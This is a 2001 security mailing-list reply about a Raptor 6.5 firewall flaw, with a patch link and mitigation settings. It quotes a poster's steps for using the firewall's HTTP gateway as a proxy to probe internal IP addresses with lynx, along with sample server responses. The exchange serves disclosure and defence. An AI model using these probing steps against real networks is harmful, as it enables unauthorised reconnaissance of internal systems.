Re: Raptor 6.5 http vulnerability

[Lysel Christian Emre <chlys () WMDATA COM>]

Note, the patch can be downloaded from (for the international version):

ftp://ftp.axent.com/pub/RaptorFirewall/International/Patches/NT6.5/

> From: Alexander Bochmann [mailto:ab () gxis de]
>  > 1. Problem Description
>  >      The Raptor firewall is vulnerability for forwarding http
>  >      request on other port numbers than 80, if a rule allows http
>  >      traffic.
>  >      When an extern or internal client, configures itself to use
>  >      the nearest interface as proxy, it's possible to access other
>  >      ports that 80 on the target host.
>  >
>  > 2.1 Non Vulnerable Versions
>  >      Raptor firewall 6.0.2.
>
> Depending on the configuration and on how you try it, 6.0.2
> also seems to be vulnerable.

We have not noticed this.

> I already noticed some months ago that the Raptor (6.0.2)
> firewall's http gateway possibly leaks information about an
> internal network with the method you described, if redirected
> services are used.

It does not leaks information about the internal network. The apache
webserver can leak information from error pages:

.....
Internal Server Error
The server encountered an internal error or misconfiguration and was unable
to complete your request.
Please contact the server administrator, <email of webmaster> and inform
them of the time the error occurred, and anything you might have done that
may have caused the error.

More information about this error may be available in the server error log.



----------------------------------------------------------------------------
----

Apache/1.3.9 Server at <hostname> Port <port>
.......

> It's possible to brute-force IP addresses used on a DMZ
> network: If you use the http gateway on the external
> interface as proxy, you can access internal IPs (and
> internal DNS names) directly - just try them all ;)

This should generate some logs!

And can also be blocked by: http.urlpattern

> Example:
>
> > setenv http_proxy http://external.firewall.name:80/
>
>
> Now go on with something like...
>
> > lynx -mime_header http://192.168.95.1:80/
>
>
> ...you will either get 403 or 503 errors from the gateway
> (depending on it's configuration) for the destination:
>
> > lynx -mime_header http://192.168.95.2:80/

This is the internal interface for the firewall, right?

> HTTP/1.1 503 Service Unavailable
> MIME-Version: 1.0
> Server: Simple, Secure Web Server 1.1
> Date: Mon, 26 Mar 2001 14:59:29 GMT
> Connection: close
> Content-Type: text/html
> [.. etc ..]
>
> ...or, if you are lucky, an answer from a web server:
>
> % lynx -mime_header http://192.168.95.74:80/

And this is a request to the webserver?

http.remove-header, should remove the headers :)


> HTTP/1.1 200 OK
> Date: Mon, 26 Mar 2001 14:43:19 GMT
> Server: Apache/1.3.17 (Unix) mod_perl/1.24_01 PHP/3.0.18
> Last-Modified: Thu, 15 Feb 2001 08:23:04 GMT
> Accept-Ranges: bytes
> Content-Length: 2490
> Connection: close
> Content-Type: text/html
>
> <!doctype html public "-//IETF//DTD HTML//EN">
> [.. etc ..]